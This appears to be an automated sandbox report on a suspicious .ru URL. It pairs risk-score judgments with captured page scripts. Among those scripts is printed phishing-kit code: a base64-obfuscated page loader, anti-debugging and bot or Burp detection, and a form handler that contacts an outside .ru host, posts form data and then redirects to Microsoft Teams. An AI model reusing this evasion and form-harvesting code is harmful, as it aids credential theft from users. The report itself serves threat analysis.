Windows Analysis Report
https://whtt.termlicari.ru/HnkNbg/

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://whtt.termlicari.ru

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution."
}

if(atob("aHR0cHM6Ly9XSHR0LnRlcm1saWNhcmkucnUvSG5rTmJnLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNUbXBwQkV6VUptIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI1RtcHBCRXpVSm0gaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1RtcHBCRXpVSm0gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojVG1wcEJFelVKbSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1RtcHBCRXpVSm0uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNjZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI1RtcHBCRXpVSm0gLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNUbXBwQkV6VUptIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojVG1wcEJFelVKbSAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNUbXBwQkV6VUptIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNUbXBwQkV6VUptIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojVG1wcEJFelVKbSAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojVG1wcEJFelVKbS5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI1RtcHBCRXpVSm0gLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNUbXBwQkV6VUptICNUeFVBZU94dXd5IHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQp4a2N5ZGxoTFh5ID0gZmFsc2U7DQooZnVuY3Rpb24gVk1RWUJHSEp0VCgpIHsNCiAgICBsZXQgT3dpUUlPUk1BeiA9IGZhbHNlOw0KICAgIGNvbnN0IHZSaWhaUFlGeEYgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IElTSWtIbU9lVlcgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAg

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to the 'teams.microsoft.com' domain, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicates a high risk of malicious intent."
}

turnstile.render('#cf', {
    sitekey: '0x4AAAAAAA1mFKVzQ_w5aB5q',
    'error-callback': FjcNUJhjKp,
    callback: KDXCeiyHNL,
});
function FjcNUJhjKp() {
    turnstile.reset();
}
function KDXCeiyHNL() {
    var BcmwpnZpuR = document.getElementById("ApqnvNOwgA");
    BcmwpnZpuR.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = '8aWT';
    var PYDALTVlmk = "../vbD4AhHC1Ftvlm4w3ZKxn";
    fetch('https://nFT3stMa7fTpc3rNtXdlVbEnmKj0N4BQvIksDd1HG2Oc6z9Ylbx4NsGb86yd.ygncsqvu.ru/137822074341232698932967bXMVeYGPEMZOQOIMNADCIBCJWKNZVUVKSDPPPPJTEXIIQLUJMXKTCR', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    if(text == 0){
    fetch(PYDALTVlmk, {
        method: "POST",
        body: new FormData(BcmwpnZpuR)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        if(xkcydlhLXy == false){
        location.reload();
        }
        }
        if(data['status'] == 'error'){
        window.location.replace('https://teams.microsoft.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://teams.microsoft.com');
    }
    })
    .catch(error => {
    window.location.replace('https://teams.microsoft.com');
    });
}

{
    "risk_score": 2,
    "reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. The script sets up various configuration options for the Cloudflare challenge, but does not exhibit any high-risk behaviors. The script is likely legitimate and part of the website's security measures."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'wy4oj',
                chlApiSitekey: '0x4AAAAAAA1mFKVzQ_w5aB5q',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: '3v.FAj6A9yXFK1qX73PnNW6xs49R1PjnhXsf7aChzNg-1734624651-1.3.1.1-AvUZWMc38xD2N6z7BD4LGNKTBB4_Oo_Tnmf9T3F9EeI',
                chlApiTimeoutEncountered: 0,
                chlApiOverrun

{
    "risk_score": 8,
    "reasoning": "This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The script also includes obfuscated code and a self-executing function, which are common techniques used in malicious scripts. Overall, this script demonstrates a high level of suspicious and potentially malicious activity."
}

    if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
xkcydlhLXy = false;
(function VMQYBGHJtT() {
    let OwiQIORMAz = false;
    const vRihZPYFxF = 100;
    setInterval(function() {
        const ISIkHmOeVW = performance.now();
        debugger;
        const RffUQBgEEm = performance.now();
        if (RffUQBgEEm - ISIkHmOeVW > vRihZPYFxF && !OwiQIORMAz) {
            xkcydlhLXy = true;
            OwiQIORMAz = true;
            window.location.replace('https://teams.microsoft.com');
        }
    }, 100);
})();
    

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
}

"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the Cloudflare challenge and providing translations for the user interface. This behavior is consistent with the expected functionality of a Cloudflare challenge script, and there are no clear signs of malicious intent. Therefore, the risk score is assessed as low (1)."
}

window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_feedback_description":"Send%20Feedback","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20are%20human","turnstile_refresh":"Refresh","turnstile_expired":"Expired","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","testing_only":"Testing%20only.","turnstile_footer_terms":"Terms","turnstile_failure":"Error","turnstile_footer_privacy":"Privacy","turnstile_verifying":"Verifying...","turnstile_overrun_description":"Stuck%20here%3F","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_success":"Success%21"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eT,eV,eW,eX,f9,fl,fr,fs,ft,fD,fO,fS,fT,fU,g1,g7,g8,gB,gC,gG,gH,g5,g6){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1516))/1+-parseInt(gI(741))/2+parseInt(gI(1388))/3+parseInt(gI(855))/4*(parseInt(gI(549))/5)+-parseInt(gI(582))/6+-parseInt(gI(1632))/7*(parseInt(gI(615))/8)+parseInt(gI(1231))/9*(parseInt(gI(412))/10),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,410253),eM=this||self,eN=eM[gJ(1590)],eM[gJ(1460)]=function(gK,d,e,f,g){gK=gJ,d={},d[gK(632)]=gK(1116),d[gK(836)]=gK(1380),d[gK(865)]=gK(1118),e=d,f=1,g=1e3*eM[gK(734)][gK(787)](2.01<<f,32),eM[gK(1657)](function(gL){gL=gK,eM[e[gL(632)]]&&(eM[gL(1605)][gL(1467)](),eM[gL(1605)][gL(1404)](),eM[gL(1506)]=!![],eM[gL(1116)][gL(547)]({'source':e[gL(836)],'widgetId':eM[gL(1070)][gL(553)],'event':e[gL(865)],'cfChlOut':eM[gL(1070)][gL(986)],'cfChlOutS':eM[gL(1070)][gL(1691)],'code':gL(1113),'rcV':eM[gL(1070)][gL(1087)]},'*'))},g)},eM[gJ(1148)]=function(g,h,i,gM,j,k,l,m,n,o,s,x,B,C,D,E,F,G,H){k=(gM=gJ,j={},j[gM(935)]=gM(1165),j[gM(361)]=gM(526),j[gM(1163)]=function(I,J){return I+J},j[gM(619)]=gM(1542),j[gM(1300)]=gM(509),j[gM(1415)]=function(I,J){return I+J},j[gM(1528)]=function(I,J){return I+J},j[gM(1594)]=function(I,J){return I+J},j[gM(1539)]=function(I,J){return I+J},j[gM(647)]=gM(477),j[gM(649)]=gM(1093),j);try{for(l=k[gM(935)][gM(975)]('|'),m=0;!![];){switch(l[m++]){case'0':n=eO(g[gM(515)],g[gM(1294)]);continue;case'1':o=i||k[gM(361)];continue;case'2':g[gM(515)]instanceof Error?g[gM(515)]=JSON[gM(894)](g[gM(515)],Object[gM(1251)](g[gM(515)])):g[gM(515)]=JSON[gM(894)](g[gM(515)]);continue;case'3':x=(s={},s[gM(125

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on cryptographic operations and data manipulation, which are common in legitimate applications. While it uses some legacy practices like the `XDomainRequest` API, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of cryptographic functionality and is likely part of a legitimate application."
}

!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes some communication with the parent window, which is a common pattern for these types of challenges. While the script uses some dynamic behavior, such as `postMessage()`, it does not exhibit any clear signs of malicious intent or data exfiltration. Therefore, the overall risk score is low, as this script is likely part of a legitimate security mechanism."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'wy4oj',
                chlApiSitekey: '0x4AAAAAAA1mFKVzQ_w5aB5q',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: '3v.FAj6A9yXFK1qX73PnNW6xs49R1PjnhXsf7aChzNg-1734624651-1.3.1.1-AvUZWMc38xD2N6z7BD4LGNKTBB4_Oo_Tnmf9T3F9EeI',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '8f48aa48791f0c88',
                cH: 'l0eL9Tb8p9y9dn66cdMNZOoGvAYbd0aFSYXRkGF_wRU-1734624651-1.1.1.1-Xr596y7bN0__dwW_jtFmZlP1YhzM8NQMrEXkLOXrzh.VYokDEhNY0.Guu7mL_OQg',
                cFPWv: 'b',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'auto',
                wS: 'normal',
                md: 'MjXz7X2m7ESIBEo9LVWux.Lg9wEpFdBlO0n6m3RKVAk-1734624651-1.1.1.1-lWcr4ZOyl0F7jTA2ttE6nbmmP4geXBs7EE_ou96x2OiP2EdelAUHMd_pxEQU078KRVxaYSWRrPDhEHPLi0y2W7gDoSIiY_bKi3CD45CoCH9t0QzKvHgWXNPZ37NWzaOZipWFf2wj6lMIYwsrDW_7nvcKboXfT8HHlZ4394PWgJmsYdc6BRxCTtW9N.VY7eSKzosGJcWni6hZSTob3d1AlxBXg7ANI5iRuelIVy.rWK8aXPI14.SxS4r.maa3LaNXsqsAEO7qlpAyHBLtVYhjZ8FUfqauICePPF2KHeuIczGSm4.0QSU8yTwQIthGSiBsZMZAo35w0G7MrQ0t_6EbYbFH5ScNaWKdfhtT_jaukaIGmz983wvV3OdjLlT30k8_lSVpL0p1T0k.4g0tEXVr.QVBFR0uJDZJQOgbPEsFUJ4w6xWMuC6TY_gLaUzva6xMzY_t0DSns6yHOM4NA14ZKSFMiuW1nPDGIURebCjeh23g751PYXOYTO595To2migldUdOQaVxmJiiYEezfSB_Fv907V6LzD4f_Cg.YbzLWelpWWSm_FuwrKGJEHNwfUFmxUYPT8G0L9sCnRHPZ9XW9qa8MT5Kfjey0jqtS8MMCCb5ChlBZ__a.h0cDJHQdZBPeejMjuCBDJsPwbbH2ZElHvH1H1WHCtdLuVSAHQ2qyyyTUCkH4lqsVKbvDUB3wD_QjkWZ4UT4hOmIsdR5kiK.jl9kQ4Lr0AoerQcglqPKGFuXxm75lLwd1ONi.ZjKyy.xZwtLqDXZ2VC_IuKi8vdUW9Ag3PQ1mTgWvOJFOIHQm8ggeYaL1A5X8FZ_BQmOy12lbdZTDnwUvq0C1yG.Rh_VGuphcAUjY8mV2eRjjhQpqylKhrTL1ECtw2Bpx3cRcUSEfm